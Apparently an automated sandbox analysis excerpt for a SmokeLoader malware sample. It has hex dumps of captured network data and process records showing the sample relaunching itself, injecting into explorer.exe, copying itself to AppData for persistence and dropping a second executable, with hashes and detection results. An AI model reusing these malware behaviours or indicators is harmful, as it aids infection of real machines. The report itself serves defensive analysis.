                                                                                                                                  2022-01-11 22:39:11 UTC6598INData Raw: 40 73 d2 c0 f3 9b 4a 00 b2 56 97 7f 24 f5 10 48 01 14 ca 37 6b 7b 46 92 d4 13 77 00 f7 bc 32 55 53 0c be c5 c1 30 b2 31 5d fe c0 ca 3e 39 62 eb 7c 00 2d 34 96 f9 cf d3 28 66 00 19 a5 40 90 10 73 85 94 01 0e 3f 48 4f f5 2b 4e d7 f0 bd e6 17 00 90 08 be 6b 30 f6 15 e9 0c 02 b3 47 20 62 1a 00 ca 8f 51 57 a8 32 ad 64 74 22 07 28 bb fd 1b c4 c0 20 3d 58 27 03 30 d4 45 0f a5 b9 a3 7e e8 c0 0e 6c 00 ac 36 0b 8b a4 55 15 92 b8 97 00 4b bf ca 21 c8 1c c9 34 e9 e7 ff a0 8b fe 22 14 00 f9 2e ff 64 27 8f 71 94 00 2f a8 a4 42 4a b4 8d 21 1d 60 6c 0e 49 02 3c 80 8b 53 7d 54 96 00 26 38 74 b1 4b 25 d2 10 00 29 eb 1c 1e f2 5d 09 1b 00 51 ee 52 a9 66 77 f9 26 00 91 28 2c 3b 4a 74 f2 d0 00 b9 a6 6a 1f 5c 9f 42 b7 78 c7 7c c5 00 84 e6 ba 39 20 54 24 ea 00 88 63 f8 4f 0d 1c
                                                                                                                                  Data Ascii: @sJV$H7k{Fw2US01]>9b|-4(f@s?HO+Nk0G bQW2dt"( =X'0E~l6UK!4".d'q/BJ!`lI<S}T&8tK%)]QRfw&(,;Jtj\Bx|9 T$cO
                                                                                                                                  2022-01-11 22:39:11 UTC6614INData Raw: 14 0f 00 b7 c9 13 22 cf bf 54 04 07 4f f4 97 a1 43 60 2e f0 6d 51 00 c9 99 67 d6 71 2f 74 d8 00 7a 8b 8a 57 65 0b 6b 81 1d 69 08 66 1e 64 80 75 5f 36 a9 27 6a 00 9d c8 0b 89 7b 77 82 b1 00 7d 5d 40 c3 f4 c6 98 0a 7f 4b 00 ff c9 92 43 ab 28 fc 31 04 a4 20 12 a7 14 ab 00 f4 88 64 d7 73 13 05 4d 89 f2 2f 45 c0 5f 24 6c 39 00 30 8c e0 21 8d 2d f6 af 00 de 9f dc 44 5a df 71 18 00 64 04 08 7c 09 db 65 fb 0f 8d eb fe dc c3 57 36 c6 e8 17 3d 84 7c 6d 7e d3 00 86 3e ab a1 5b db b9 10 00 43 41 a8 44 b7 94 b3 d3 00 ce e2 87 34 08 da 86 9f 00 8e 27 75 25 d4 c6 4b 04 00 50 56 ea 88 a1 33 4e 63 00 89 79 ad 18 ee c9 97 6c 00 b3 b7 91 8b bc 0b 11 4a 0e 41 21 84 7b a0 3e 9a 3c 52 a7 07 c5 74 6b 2a a3 e0 cb 59 29 0f 3f 49 0a 00 9d 53 88 e2 d7 16 46 00 d2 b4 bf bd e0 4b c8
                                                                                                                                  Data Ascii: "TOC`.mQgq/tzWekifdu_6'j{w}]@KC(1 dsM/E_$l90!-DZqd|eW6=|m~>[CAD4'u%KPV3NcylJA!{><Rtk*Y)?ISFK
                                                                                                                                  2022-01-11 22:39:11 UTC6630INData Raw: 94 3f 5e 5b e2 00 4b 6c 37 bc 28 01 0f db 32 19 33 80 ca c0 22 e1 35 1c 58 bd b2 80 2e 9b 56 3f 1c 09 00 40 3a 66 54 0c 05 7a 3b 1d 7e a8 0e 00 86 3c 8a 3d 8e 26 00 92 44 93 e8 49 b2 76 20 3e f4 2b 80 3a 3e 5b 79 82 2e 11 00 d4 10 1d 8c 28 6c 66 fe 04 dc f0 d8 44 4c c3 25 c1 a0 88 3c 8e 02 3a a9 3b c5 2f 5d 77 e0 49 d1 20 01 2b 0e ba 74 93 02 a0 d9 37 20 fa 7c 0e 1d d3 92 c2 20 06 05 d0 66 4b b0 f5 3b 02 48 80 de 4a 8b 83 9e aa 90 cb 58 ce 00 94 1e a6 ae 0e fe fb 98 de 03 06 b8 20 01 5a 49 d8 0c 6d 89 01 80 e1 68 e7 d0 0f 33 f1 1b c0 25 3a 07 c1 c0 53 e9 60 30 fc 7a f2 87 0b a7 fe 94 e5 80 81 d6 4f 9c 74 14 16 73 f0 8e 00 95 61 ba ea f1 fd 60 00 fe 35 72 25 59 31 f2 2e 13 42 b2 93 f0 48 71 00 df fc 9f 7e 96 8d c3 40 0f 9d f3 a6 f2 ee 70 3f 07 cb 4b d8 d3
                                                                                                                                  Data Ascii: ?^[Kl7(23"5X.V?@:fTz;~<=&DIv >+:>[y.(lfDL%<:;/]wI +t7 | fK;HJX ZImh3%:S`0zOtsa`5r%Y1.BHq~@p?K
                                                                                                                                  2022-01-11 22:39:11 UTC6646INData Raw: 05 ac 57 57 07 07 8c 45 c7 8c 37 29 12 13 d5 e4 51 ca 50 87 2d 8d c6 ef 9b d3 40 3f 05 0f 9a 95 0c 40 d6 ea 8a 2f 1a 8b af f8 cd a4 55 c0 84 99 41 e1 ff 7c 95 b2 60 53 c6 dd 77 68 76 f9 68 2e 74 21 b2 ba c7 c9 c2 c9 a1 e0 ee 56 41 a5 7a d1 a5 73 4e 80 52 f7 35 38 e9 30 38 7b 1a e4 0d 0d 39 de 64 09 e5 66 c7 ff 1b 8a 55 b4 0e 7e 05 ac 84 25 fa f2 21 20 f2 30 f8 ba e0 52 a9 99 b9 83 b3 ee f9 43 b4 dd 9b ab eb 36 b7 b0 18 3a 4d c6 6a 18 6e 1c e9 54 d6 e3 57 30 28 da 7a 5f 45 f4 f7 72 17 61 c9 be 72 e4 de 37 be d8 ba 68 9f 3e 32 2a 96 f3 e5 13 e6 24 4f d4 d5 37 66 73 97 f3 fb 60 d3 0b dc ae 6f 63 26 d1 06 40 45 2e 7c 8c 94 da 85 e2 2d fe 07 6d e4 28 17 25 88 08 f7 ad d8 8f 21 4a 8e 97 9a 15 bc cc c5 b2 9d f3 ed 35 b8 a7 ae d1 f5 e9 c1 7d d5 68 25 e0 88 b3 ff
                                                                                                                                  Data Ascii: WWE7)QP-@?@/UA|`Swhvh.t!VAzsNR5808{9dfU~%! 0RC6:MjnTW0(z_Erar7h>2*$O7fs`oc&@E.|-m(%!J5}h%
                                                                                                                                  2022-01-11 22:39:11 UTC6662INData Raw: 76 0a f5 0e ba 80 da 6f 07 fb d8 54 b7 20 f6 36 7b 08 f0 02 3d 6f 02 e4 24 26 77 0a 3a af 7d 44 92 e3 03 5f 7d f9 2d 85 ce e6 73 4e f1 6f 67 01 09 06 85 54 17 65 76 37 89 f8 15 64 2a 4f a9 c9 d7 58 ed b3 d2 9b 0d d4 4d d2 25 05 4f b2 d9 04 b5 42 9f 4d ba c2 86 c7 6a 59 0d 2b 20 c1 32 47 fb 37 d6 ed bb af 5e 37 2a 8f 38 d8 27 e1 c5 4e cc 85 cc 61 a7 c4 af a1 73 ee 91 44 dc ff 59 d5 d5 85 c9 19 74 dd 94 30 6c 33 51 32 63 d1 34 b3 d9 53 bf 48 c0 fb 88 2c 75 de fd 1a 5f e7 67 c5 83 22 c3 0b e3 2d 98 cc 68 d6 65 62 69 ca 58 38 00 34 89 fa 38 8a 57 27 f5 90 3d 9f 55 12 36 3d 63 d1 8a 25 87 e4 3e 56 e0 8f d9 02 d5 7b 4d 7e 1f f8 da 8b 76 0b 52 de 4d fc 02 02 4b 8b e9 33 9e d8 b4 54 19 5d e2 e5 f4 29 14 1c c8 fe 4e 49 34 2a 07 92 d5 73 51 6d dd d7 21 64 d2 15 d2
                                                                                                                                  Data Ascii: voT 6{=o$&w:}D_}-sNogTev7d*OXM%OBMjY+ 2G7^7*8'NasDYt0l3Q2c4SH,u_g"-hebiX848W'=U6=c%>V{M~vRMK3T])NI4*sQm!d
                                                                                                                                  2022-01-11 22:39:11 UTC6678INData Raw: de 3a f8 9d 49 ca 45 11 03 7f 5c 95 fe c1 b3 f3 67 85 47 bd 7a 3b 1b 0a da 77 f1 34 44 54 32 f0 8c 1c bc 74 9a db ef 4c 5e 12 c1 df ad 30 92 c3 27 4e f8 da 78 b3 39 bb a7 24 c6 62 6e cc a5 b6 f1 31 b3 31 62 9a e6 eb 81 f7 72 52 18 f0 d3 2d 7d 5d a4 40 24 9b 27 a6 b1 da d6 1b 8e 79 6f 07 87 66 0e b9 d5 64 ef 20 07 9a 0c fb b6 76 b0 25 0b b1 1d 8b 0d ba 22 62 59 89 93 f1 8c c5 a5 ac 66 9a 84 42 93 0e 13 1c 07 8a 12 6c 76 84 9a 4f 0c db d0 94 bb 3e 5a d9 07 94 96 ba b1 08 28 5e f4 d1 48 79 aa 48 a6 5f f1 a8 4c e7 31 00 b1 90 e2 fa 54 80 38 6e 91 2f 15 49 df 12 6c 3e dc 05 d5 85 45 72 d5 43 7f df 93 fe ec 58 fa 93 2e 6a e5 85 cb d9 b6 4e b2 11 ea 9a 39 59 56 80 ad 3a 5f a5 25 5e 95 0d c6 8c d8 fb 22 b8 4f a8 00 1d 5f ca f1 d0 51 54 1a 8b 1e 61 0b 14 f0 04 ef
                                                                                                                                  Data Ascii: :IE\gGz;w4DT2tL^0'Nx9$bn11brR-}]@$'yofd v%"bYfBlvO>Z(^HyH_L1T8n/Il>ErCX.jN9YV:_%^"O_QTa
                                                                                                                                  2022-01-11 22:39:11 UTC6694INData Raw: ad c3 94 ab 64 0d 16 06 2b c6 3a 65 11 22 38 95 cb 48 1e ee 1c 9e 04 e3 94 fb 9d 34 54 60 d8 6e f0 9b 60 03 d1 c4 c4 28 f4 fd a2 d3 8c d7 f3 4a f1 5d c3 32 fc c8 5c 8d fe 2d 90 5b c3 d4 a1 ea 51 1d 83 e0 0d c8 30 51 98 42 f4 1b 89 08 2f 46 bb a1 1d b9 d2 0e 24 73 b4 c0 a2 4b 4a 8e 2e 71 1f 47 32 13 93 af 53 ac ff 5b b9 a9 cc cc 24 8c ea 10 1b 7e d7 6e f9 ee 7c 3e c8 4d 02 8f 91 16 fd 7f de 4d ac 4a 9e bf ed e1 ee 66 98 5f 06 64 76 e9 69 96 51 f8 51 da 07 b4 f1 76 11 b6 e7 32 d5 ae 47 61 b7 66 c7 2e 2c f4 85 e7 06 b4 63 b7 ff c3 b9 51 75 92 87 6f 6a cd 5b b1 ee 68 73 7e 99 b8 a4 f7 94 08 e7 c3 1d f0 d9 13 05 f8 25 89 59 f7 e0 34 0d cf 66 05 bc 74 6e 8d 44 51 bf ed 2b 5e 8e f2 a4 d3 fa ca a0 74 1c 5b 3d 4c 56 b7 72 7c 83 f2 73 a6 cd 3a 6d 08 96 1f be 85 e9
                                                                                                                                  Data Ascii: d+:e"8H4T`n`(J]2\-[Q0QB/F$sKJ.qG2S[$~n|>MMJf_dviQQv2Gaf.,cQuoj[hs~%Y4ftnDQ+^t[=LVr|s:m
                                                                                                                                  2022-01-11 22:39:11 UTC6710INData Raw: cd 47 03 cd 61 b0 5f d1 09 ad c8 57 1a fb 2a 79 01 ca c3 d1 58 a8 93 4c b7 f6 c9 2e 3d 33 db 27 44 45 5a 1a 60 4c 90 c7 c1 f2 de ee 4a 08 d8 4b 57 b8 25 f2 57 e9 ff 9f 53 69 68 52 97 40 dd a6 af cb d6 bb 0e 3f 69 e7 91 d2 79 af 30 58 a2 5f 19 1f 45 d4 f3 6c 83 a8 7b 35 11 85 29 ac 91 7f f9 8b 26 2d bb 9a d3 76 5e 67 b0 86 27 8e 71 7e 6f fe fc 71 63 de 83 93 86 cf c3 7b b3 6f 9b aa f3 61 43 02 6f 3f de a3 b4 11 50 dc 78 ee 90 fc 2a 12 74 cd 6c 53 b6 bd 38 2d af 24 c2 af 67 71 bc 98 64 24 7c 90 08 25 88 a3 69 75 c6 6b 5d d7 6f 51 ff e1 17 e9 af d5 19 05 17 b8 f8 a0 cd f8 56 74 1f 7a ff a2 f4 06 41 9e b1 f6 4b f0 76 53 1d e3 1a ce 2c 85 d3 77 bd d0 f2 04 d2 28 f0 32 33 dc 6b 23 a8 eb b2 9d 28 5a 6a 71 a8 f3 f2 3c f6 ee a1 38 98 4d 7e a1 8d c6 b7 9c a4 b0 d4
                                                                                                                                  Data Ascii: Ga_W*yXL.=3'DEZ`LJKW%WSihR@?iy0X_El{5)&-v^g'q~oqc{oaCo?Px*tlS8-$gqd$|%iuk]oQVtzAKvS,w(23k#(Zjq<8M~
                                                                                                                                  2022-01-11 22:39:11 UTC6726INData Raw: 8f 83 e6 58 a8 8e 3b 2a 6e 99 c2 2b 15 f1 7d ea c4 aa ac 57 f3 1c 0b 73 3c 32 14 5e b4 5f aa 6b 8a a1 04 7c e5 f2 4d 5d 93 d0 8c d8 1c 82 b7 30 c1 7b 01 c6 7f 17 51 46 ae 90 79 bd 82 92 05 d8 0d fc 9a 0b c0 87 71 23 47 a2 9a 81 dd 6b 21 91 11 08 ff 92 75 fb 69 3f 27 de 9e 5d 24 23 07 e5 af 10 25 e0 01 78 48 e9 aa f7 a8 89 78 63 03 85 ee 25 b7 9f 86 11 97 0c 5b 2b 40 99 dd 74 aa 79 b9 3e 10 15 ca 64 63 e4 45 ab 46 56 0e d6 03 80 e1 b5 db 7e 84 19 36 37 7b 13 61 bf f1 82 fe 84 b3 ce aa 61 6f c6 c3 d5 bc d7 d4 f6 8c 57 d1 05 e0 47 e1 79 a7 15 73 3a 4b be fd c7 7a 88 cb 9f 25 a1 95 e4 55 16 22 61 05 5e 99 83 47 31 cd 3f 9b 3b 58 6b cc 2f 7f 8e 69 c5 bf 86 0e ee aa 7f e1 37 03 d6 24 13 90 03 63 cd a3 a1 88 ca 64 60 f8 bb 7c 51 9e fb 5f e1 f8 2c 64 19 e5 b6 74
                                                                                                                                  Data Ascii: X;*n+}Ws<2^_k|M]0{QFyq#Gk!ui?']$#%xHxc%[+@ty>dcEFV~67{aaoWGys:Kz%U"a^G1?;Xk/i7$cd`|Q_,dt
                                                                                                                                  2022-01-11 22:39:11 UTC6742INData Raw: 38 ff 94 4f 9f 81 a2 9f 4f f3 39 bb 82 1f ae d8 ca 45 b4 08 79 d7 b3 17 66 9a dd 12 71 38 a1 69 31 67 5d 5e 82 dc 4b 51 d5 bd e8 c5 c6 c2 85 a9 b1 45 cc 2e 41 87 03 aa d5 d1 ee 5f 6c d6 8d 64 d4 0e 24 bf c0 61 7a 52 74 8b f0 08 72 f4 ee b4 42 77 17 20 67 c6 b5 59 08 79 85 e0 d6 79 ef cf a8 8f a6 af d5 8e ef 57 3f 72 0a e9 59 37 e6 72 cf 55 97 11 69 db 75 67 cc 8d b9 12 42 56 57 8f 68 a9 16 e7 9c 2e 87 02 41 fd 8d af a3 43 14 4f 03 32 64 b1 2a e0 4f f5 51 ae 17 a5 75 12 2d 60 dc 44 4e 80 49 8c a3 ce b8 a2 07 c5 61 c6 3e ca d0 a1 ff c8 ea 22 84 01 29 ec eb 25 c8 23 4c 9f 13 c1 8f 85 14 3d 5d fe 8a fb c2 ae 4f 34 55 69 16 d5 f4 2d d3 15 f8 90 d6 ff 68 c6 11 5a e1 6c 8a 1d f4 44 72 72 52 5a 11 5d fc 8b c9 c2 76 71 fe ce 28 f2 32 9b 68 25 50 b0 e8 95 ea 48 95
                                                                                                                                  Data Ascii: 8OO9Eyfq8i1g]^KQE.A_ld$azRtrBw gYyyW?rY7rUiugBVWh.ACO2d*OQu-`DNIa>")%#L=]O4Ui-hZlDrrRZ]vq(2h%PH
                                                                                                                                  2022-01-11 22:39:11 UTC6758INData Raw: 2e 8f fb b6 4e d8 dd 15 80 f3 90 43 7e dd 15 cc 8d 83 56 e4 44 7f da da 87 c7 14 1b 73 df 24 66 2b e0 ba da e0 74 fc 3a f5 99 58 7b c6 60 2c df 47 20 9d 5f 56 c1 38 9d be ce 88 cf 48 fd ff 69 08 73 b2 da 44 7d 6a ab 36 fb 62 16 f1 44 10 26 bb b6 75 c9 8b 64 ba 8e fa 68 92 54 44 9e 1b ea 65 f4 c6 c5 67 75 5b d1 a6 da bb 55 f9 a5 7d d0 cb 71 90 e1 1c 4c 47 9c e1 ee fc 49 eb 64 6b a0 21 0b 19 b1 11 11 5c 0f 0a 33 27 4d a1 38 bf 32 ba 0a f4 f2 86 f7 e1 35 ce 31 d4 11 85 44 e9 97 bc 9d 3e d8 2c d8 fd a5 47 c8 c4 78 67 c2 a9 d2 64 8a df 63 28 99 b2 83 81 77 68 15 08 f2 2f 3a a3 e5 2c 11 d0 eb 3d 53 4b ab 41 c1 fc e8 03 e2 1a d6 36 7a 38 f9 6c 67 73 f4 76 d3 4e 7b c0 52 19 62 20 62 63 fa 71 47 b8 d6 e5 df f7 44 63 88 7b 70 0c 46 af 1e ab 9c 54 eb 56 5a cb c5 ea
                                                                                                                                  Data Ascii: .NC~VDs$f+t:X{`,G _V8HisD}j6bD&udhTDegu[U}qLGIdk!\3'M8251D>,Gxgdc(wh/:,=SKA6z8lgsvN{Rb bcqGDc{pFTVZ
                                                                                                                                  2022-01-11 22:39:11 UTC6774INData Raw: 16 19 d6 d4 16 27 32 34 d2 ea 2c c8 27 ec 98 57 f1 2b 2f bd e3 e6 75 5b bd 9d 8c a4 53 42 58 1b 48 81 12 5b bf a3 de 52 95 12 1c fa f0 fb 0a d1 ab 82 c4 86 a3 8b 92 11 7d 74 c5 95 d9 b5 80 ca f7 b9 90 d5 73 0a 7f 20 41 a8 c6 63 bc 2e b0 bf 9e a5 6c 03 1a 91 79 1c 23 07 74 79 03 94 5b fa 77 cc 00 d4 9b 80 3f 16 49 28 1a fc 4a 5a 04 33 87 b0 f5 32 f0 fe 9b ea d9 53 06 5e d0 6f ea e7 1b f9 65 2c 07 fe 90 5a c1 7e ef e6 29 5e 1d 02 6f 16 50 42 0f 3c 8c a6 1a 68 7e 1a 5f 9c 73 a9 45 33 38 d9 99 5b 32 56 af 53 29 44 22 31 4d c6 bd 86 60 3c 4c 4a f2 36 6f da 58 7b 0a 3e 7b 81 d1 63 43 22 8f bc 89 ea 71 76 67 46 57 43 00 40 71 70 2c b7 f6 8d ea 30 47 db fa 6c 0f 51 c8 7b b0 96 3a 3a ef fd 6b f5 72 0a 7f da 28 c9 bc 61 59 4e cd 79 af 8c 1a a8 69 fa aa fd 89 9d e1
                                                                                                                                  Data Ascii: '24,'W+/u[SBXH[R}ts Ac.ly#ty[w?I(JZ32S^oe,Z~)^oPB<h~_sE38[2VS)D"1M`<LJ6oX{>{cC"qvgFWC@qp,0GlQ{::kr(aYNyi


                                                                                                                                  Code Manipulations

                                                                                                                                  Statistics

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Start time:23:37:16
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Users\user\Desktop\NNOKmCIVoi.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\NNOKmCIVoi.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:285696 bytes
                                                                                                                                  MD5 hash:31A601A28F4A81A69C9B09D7249582B9
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Start time:23:37:18
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Users\user\Desktop\NNOKmCIVoi.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\NNOKmCIVoi.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:285696 bytes
                                                                                                                                  MD5 hash:31A601A28F4A81A69C9B09D7249582B9
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.319704105.0000000002161000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.319374024.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Start time:23:37:21
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                  File size:51288 bytes
                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:23:37:25
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                  Imagebase:0x7ff693d90000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000000.304234913.0000000004F21000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:23:37:28
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                  File size:51288 bytes
                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:23:37:31
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                  File size:51288 bytes
                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:23:37:33
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                  File size:51288 bytes
                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:23:37:34
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                  File size:51288 bytes
                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:23:37:35
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                  Imagebase:0x7ff646690000
                                                                                                                                  File size:163336 bytes
                                                                                                                                  MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:23:37:35
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                  File size:51288 bytes
                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:23:37:42
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                  File size:51288 bytes
                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:23:38:02
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                  File size:51288 bytes
                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:04
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\eugcwgv
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\eugcwgv
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:285696 bytes
                                                                                                                                  MD5 hash:31A601A28F4A81A69C9B09D7249582B9
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 65%, ReversingLabs

                                                                                                                                  General

                                                                                                                                  Start time:23:38:07
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\eugcwgv
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\eugcwgv
                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                  File size:285696 bytes
                                                                                                                                  MD5 hash:31A601A28F4A81A69C9B09D7249582B9
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.376787167.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.376757329.0000000001F30000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                  General

                                                                                                                                  Start time:23:38:08
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\3412.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\3412.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:301056 bytes
                                                                                                                                  MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 77%, ReversingLabs

                                                                                                                                  General

                                                                                                                                  Start time:23:38:11
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                  File size:51288 bytes
                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:12
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2196 -ip 2196
                                                                                                                                  Imagebase:0xef0000
                                                                                                                                  File size:434592 bytes
                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                  Has elevated privileges:true
